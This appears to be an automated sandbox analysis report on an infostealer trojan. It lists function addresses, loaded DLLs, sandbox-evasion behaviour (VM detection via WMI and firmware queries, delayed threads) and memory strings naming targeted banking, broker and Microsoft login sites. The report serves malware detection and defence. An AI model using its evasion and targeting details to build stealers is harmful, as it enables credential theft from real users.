Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 2_2_0044CD60	2_2_0044CD60
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 2_2_0042CD11	2_2_0042CD11
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 2_2_0043FDC0	2_2_0043FDC0
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 2_2_00407DD0	2_2_00407DD0
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 2_2_0040CE40	2_2_0040CE40
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 2_2_0044CE50	2_2_0044CE50
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 2_2_00443E2E	2_2_00443E2E
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 2_2_0042EE30	2_2_0042EE30
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 2_2_00411E3A	2_2_00411E3A
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 2_2_00445EC0	2_2_00445EC0
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 2_2_0043CEE0	2_2_0043CEE0
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 2_2_0041DEF1	2_2_0041DEF1
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 2_2_00428EA0	2_2_00428EA0
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 2_2_00403F00	2_2_00403F00
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 2_2_00424F29	2_2_00424F29
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 2_2_0044DFD0	2_2_0044DFD0
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 2_2_00408FE0	2_2_00408FE0
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 2_2_00437FFD	2_2_00437FFD
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 2_2_00446F87	2_2_00446F87
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 2_2_0042AF8B	2_2_0042AF8B
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 2_2_007D6070	2_2_007D6070
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 2_2_00801890	2_2_00801890
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 2_2_007FF060	2_2_007FF060
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 2_2_007E4040	2_2_007E4040
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 2_2_008000D0	2_2_008000D0
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 2_2_007EA820	2_2_007EA820
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 2_2_007E9020	2_2_007E9020
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 2_2_007FA020	2_2_007FA020
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 2_2_007EC010	2_2_007EC010
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 2_2_007D1000	2_2_007D1000
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 2_2_00803813	2_2_00803813
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 2_2_007D58A0	2_2_007D58A0
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 2_2_007EE0A0	2_2_007EE0A0
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 2_2_007D8090	2_2_007D8090
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 2_2_007E0890	2_2_007E0890
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 2_2_007F3890	2_2_007F3890
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 2_2_007D4080	2_2_007D4080
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 2_2_007FD080	2_2_007FD080
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 2_2_007DE170	2_2_007DE170
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 2_2_007D4940	2_2_007D4940
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 2_2_007EC940	2_2_007EC940
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 2_2_007F0110	2_2_007F0110
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 2_2_007F9100	2_2_007F9100
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 2_2_0081C908	2_2_0081C908
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 2_2_007D31F0	2_2_007D31F0
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 2_2_007EB1E0	2_2_007EB1E0
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 2_2_00802920	2_2_00802920
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 2_2_007FF9B0	2_2_007FF9B0
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 2_2_00803160	2_2_00803160
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 2_2_007E6180	2_2_007E6180
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 2_2_007F8A50	2_2_007F8A50
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 2_2_007D5220	2_2_007D5220
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 2_2_007D9220	2_2_007D9220
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 2_2_007F5220	2_2_007F5220
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 2_2_007F0A10	2_2_007F0A10
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 2_2_007F6A00	2_2_007F6A00
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 2_2_007F8200	2_2_007F8200
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 2_2_007FF2E0	2_2_007FF2E0
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 2_2_007DF2D0	2_2_007DF2D0
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 2_2_007E52C0	2_2_007E52C0
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 2_2_007F9AB0	2_2_007F9AB0
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 2_2_00806A54	2_2_00806A54
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 2_2_007DEAA0	2_2_007DEAA0
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 2_2_007E4290	2_2_007E4290
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 2_2_007D2280	2_2_007D2280
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 2_2_007EFB70	2_2_007EFB70
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 2_2_007F1370	2_2_007F1370
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 2_2_007F0350	2_2_007F0350
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 2_2_007D8340	2_2_007D8340
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 2_2_007FEB40	2_2_007FEB40
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 2_2_007DC310	2_2_007DC310
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 2_2_007DB300	2_2_007DB300
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 2_2_007E73F0	2_2_007E73F0
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 2_2_007EF3D0	2_2_007EF3D0
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 2_2_007EABA0	2_2_007EABA0
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 2_2_007D6390	2_2_007D6390
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 2_2_007E3390	2_2_007E3390
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 2_2_00802480	2_2_00802480
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 2_2_00803C90	2_2_00803C90
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 2_2_007F5C60	2_2_007F5C60
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 2_2_007F8450	2_2_007F8450
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 2_2_007D2C40	2_2_007D2C40
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 2_2_007EEC40	2_2_007EEC40
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 2_2_007F8C40	2_2_007F8C40
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 2_2_007D5C20	2_2_007D5C20
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 2_2_0080B41A	2_2_0080B41A
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 2_2_007ECCE0	2_2_007ECCE0
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 2_2_00811420	2_2_00811420
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 2_2_007DE4C0	2_2_007DE4C0
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 2_2_007E3CC0	2_2_007E3CC0
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 2_2_007D54A0	2_2_007D54A0
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 2_2_007E0490	2_2_007E0490
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 2_2_00803477	2_2_00803477
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 2_2_007D6C80	2_2_007D6C80
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 2_2_007E6480	2_2_007E6480
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 2_2_007F5480	2_2_007F5480
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 2_2_007ED560	2_2_007ED560
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 2_2_007EDD50	2_2_007EDD50
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 2_2_007FFD50	2_2_007FFD50
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 2_2_007E8540	2_2_007E8540
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 2_2_008035C0	2_2_008035C0
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 2_2_007D7D30	2_2_007D7D30
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 2_2_007DF530	2_2_007DF530
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 2_2_007DAD30	2_2_007DAD30
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 2_2_007E9500	2_2_007E9500
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 2_2_007FF5D0	2_2_007FF5D0
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 2_2_007E55B0	2_2_007E55B0
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 2_2_007FEDB0	2_2_007FEDB0
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 2_2_007D9580	2_2_007D9580
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 2_2_007FDD80	2_2_007FDD80
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 2_2_00802E90	2_2_00802E90
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 2_2_007D4660	2_2_007D4660
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 2_2_007E7E50	2_2_007E7E50
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 2_2_007D8640	2_2_007D8640
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 2_2_007D3640	2_2_007D3640
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 2_2_007E6E40	2_2_007E6E40
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 2_2_007EB630	2_2_007EB630
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 2_2_007F9630	2_2_007F9630
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 2_2_007E7620	2_2_007E7620
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 2_2_007E0E20	2_2_007E0E20
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 2_2_00801EF0	2_2_00801EF0
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 2_2_007E26F0	2_2_007E26F0
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 2_2_00800620	2_2_00800620
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 2_2_007EC6A0	2_2_007EC6A0
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 2_2_007E2E90	2_2_007E2E90
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 2_2_007F8690	2_2_007F8690
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 2_2_007FB680	2_2_007FB680
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 2_2_0081E782	2_2_0081E782
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 2_2_007EFF70	2_2_007EFF70
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 2_2_007DE730	2_2_007DE730
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 2_2_007E9720	2_2_007E9720
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 2_2_007F9F00	2_2_007F9F00
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 2_2_007D9FF0	2_2_007D9FF0
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 2_2_007D67D0	2_2_007D67D0
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 2_2_007D1790	2_2_007D1790
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 2_2_007E6790	2_2_007E6790
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 2_2_007DB780	2_2_007DB780
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 2_2_007F0F80	2_2_007F0F80

Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: String function: 0041BC80 appears 102 times
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: String function: 00806F60 appears 102 times
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: String function: 00814014 appears 34 times
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: String function: 0040B360 appears 49 times
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: String function: 0080F1CC appears 46 times

Source: SoftWare.exe1.exe

Static PE information: invalid certificate

Source: SoftWare.exe1.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: SoftWare.exe1.exe

Static PE information: Section: .bss ZLIB complexity 1.0003291478064067

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@3/0@1/1

Source: C:\Users\user\Desktop\SoftWare.exe1.exe

Code function: 2_2_004452C0 CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,GetVolumeInformationW,

2_2_004452C0

Source: SoftWare.exe1.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\SoftWare.exe1.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: SoftWare.exe1.exe, 00000002.00000003.931172699.0000000003AA2000.00000004.00000800.00020000.00000000.sdmp, SoftWare.exe1.exe, 00000002.00000003.905574210.0000000003A95000.00000004.00000800.00020000.00000000.sdmp, SoftWare.exe1.exe, 00000002.00000003.906334429.0000000001359000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: SoftWare.exe1.exe	Virustotal: Detection: 42%
Source: SoftWare.exe1.exe	ReversingLabs: Detection: 39%

Source: C:\Users\user\Desktop\SoftWare.exe1.exe

File read: C:\Users\user\Desktop\SoftWare.exe1.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\SoftWare.exe1.exe "C:\Users\user\Desktop\SoftWare.exe1.exe"
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Process created: C:\Users\user\Desktop\SoftWare.exe1.exe "C:\Users\user\Desktop\SoftWare.exe1.exe"
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Process created: C:\Users\user\Desktop\SoftWare.exe1.exe "C:\Users\user\Desktop\SoftWare.exe1.exe"	Jump to behavior

Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior

Source: SoftWare.exe1.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 0_2_0080711A push ecx; ret	0_2_0080712D
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 2_2_0043F467 pushad ; iretd	2_2_0043F46B
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 2_2_00454909 push ecx; retf	2_2_0045490A
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 2_2_0080711A push ecx; ret	2_2_0080712D

Source: C:\Users\user\Desktop\SoftWare.exe1.exe

Process information set: NOOPENFILEERRORBOX

Jump to behavior

Malware Analysis System Evasion

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Users\user\Desktop\SoftWare.exe1.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController

Query firmware table information (likely to detect VMs)

Source: C:\Users\user\Desktop\SoftWare.exe1.exe

System information queried: FirmwareTableInformation

Jump to behavior

Source: C:\Users\user\Desktop\SoftWare.exe1.exe

Window / User API: threadDelayed 6466

Jump to behavior

Source: C:\Users\user\Desktop\SoftWare.exe1.exe TID: 6132	Thread sleep time: -180000s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\SoftWare.exe1.exe TID: 1180	Thread sleep count: 6466 > 30			Jump to behavior

Source: C:\Users\user\Desktop\SoftWare.exe1.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Last function: Thread delayed
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 0_2_00818ECE FindFirstFileExW,	0_2_00818ECE
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 0_2_00818F7F FindFirstFileExW,FindNextFileW,FindClose,FindClose,	0_2_00818F7F
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 2_2_00818ECE FindFirstFileExW,	2_2_00818ECE
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 2_2_00818F7F FindFirstFileExW,FindNextFileW,FindClose,FindClose,	2_2_00818F7F

Source: SoftWare.exe1.exe, 00000002.00000003.931354024.0000000003AC8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: - GDCDYNVMware20,11696494690p
Source: SoftWare.exe1.exe, 00000002.00000003.931354024.0000000003AC3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696494690
Source: SoftWare.exe1.exe, 00000002.00000003.931354024.0000000003AC3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696494690f
Source: SoftWare.exe1.exe, 00000002.00000003.931354024.0000000003AC3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696494690
Source: SoftWare.exe1.exe, 00000002.00000003.931354024.0000000003AC3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696494690s
Source: SoftWare.exe1.exe, 00000002.00000003.931354024.0000000003AC3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
Source: SoftWare.exe1.exe, 00000002.00000003.931354024.0000000003AC3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
Source: SoftWare.exe1.exe, 00000002.00000003.931354024.0000000003AC3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
Source: SoftWare.exe1.exe, 00000002.00000003.931354024.0000000003AC3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696494690
Source: SoftWare.exe1.exe, 00000002.00000003.931354024.0000000003AC3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696494690
Source: SoftWare.exe1.exe, 00000002.00000003.931354024.0000000003AC3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696494690d
Source: SoftWare.exe1.exe, 00000002.00000003.931354024.0000000003AC3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696494690u
Source: SoftWare.exe1.exe, 00000002.00000003.931354024.0000000003AC3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696494690t
Source: SoftWare.exe1.exe, 00000002.00000003.1686475427.00000000012DB000.00000004.00000020.00020000.00000000.sdmp, SoftWare.exe1.exe, 00000002.00000003.1686839866.00000000012DC000.00000004.00000020.00020000.00000000.sdmp, SoftWare.exe1.exe, 00000002.00000003.985030791.00000000012D3000.00000004.00000020.00020000.00000000.sdmp, SoftWare.exe1.exe, 00000002.00000003.1076846866.00000000012DB000.00000004.00000020.00020000.00000000.sdmp, SoftWare.exe1.exe, 00000002.00000003.1010720289.00000000012DA000.00000004.00000020.00020000.00000000.sdmp, SoftWare.exe1.exe, 00000002.00000002.2135362994.000000000129C000.00000004.00000020.00020000.00000000.sdmp, SoftWare.exe1.exe, 00000002.00000002.2135763168.00000000012DD000.00000004.00000020.00020000.00000000.sdmp, SoftWare.exe1.exe, 00000002.00000003.1010456185.00000000012D3000.00000004.00000020.00020000.00000000.sdmp, SoftWare.exe1.exe, 00000002.00000003.985710245.00000000012D3000.00000004.00000020.00020000.00000000.sdmp, SoftWare.exe1.exe, 00000002.00000003.1686657864.00000000012DB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: SoftWare.exe1.exe, 00000002.00000003.931354024.0000000003AC3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696494690}
Source: SoftWare.exe1.exe, 00000002.00000003.931354024.0000000003AC3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696494690x
Source: SoftWare.exe1.exe, 00000002.00000003.931354024.0000000003AC3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
Source: SoftWare.exe1.exe, 00000002.00000003.931354024.0000000003AC3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696494690
Source: SoftWare.exe1.exe, 00000002.00000003.931354024.0000000003AC3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
Source: SoftWare.exe1.exe, 00000002.00000003.931354024.0000000003AC3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696494690h
Source: SoftWare.exe1.exe, 00000002.00000003.931354024.0000000003AC3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696494690o
Source: SoftWare.exe1.exe, 00000002.00000003.931354024.0000000003AC3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
Source: SoftWare.exe1.exe, 00000002.00000003.931354024.0000000003AC3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
Source: SoftWare.exe1.exe, 00000002.00000003.931354024.0000000003AC3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696494690j
Source: SoftWare.exe1.exe, 00000002.00000003.931354024.0000000003AC3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696494690
Source: SoftWare.exe1.exe, 00000002.00000003.931354024.0000000003AC3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696494690t
Source: SoftWare.exe1.exe, 00000002.00000003.931354024.0000000003AC3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696494690x
Source: SoftWare.exe1.exe, 00000002.00000003.931354024.0000000003AC3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696494690}
